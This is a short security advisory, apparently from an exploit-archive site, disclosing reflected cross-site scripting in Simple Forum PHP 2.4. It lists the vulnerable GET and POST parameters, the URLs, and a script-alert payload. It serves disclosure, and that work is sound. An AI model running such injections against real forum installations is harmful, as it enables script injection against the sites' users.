Simple Forum PHP 2.4 Cross Site Scripting

2016.10.18
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

===================================================== # Simple Forum PHP 2.4 - Reflected XSS ===================================================== # Vendor Homepage: http://simpleforumphp.com # Date: 14 Oct 2016 # Demo Link : http://simpleforumphp.com/forum/admin.php # Version : 2.4 # Platform : WebApp - PHP # Author: Ashiyane Digital Security Team # Contact: hehsan979@gmail.com ===================================================== # PoC: Vulnerable parameter : SysMessage Mehod : GET Payload : <script>alert('Reflected XSS')</script> Vulnerable Url: http://localhost/forum/preview.php?SysMessage=[payload] Vulnerable parameter : search Mehod : POST Payload : <script>alert('Reflected XSS')</script> Vulnerable Url: http://simpleforumphp.com/forum/admin.php ===================================================== # Discovered By : Ehsan Hosseini =====================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top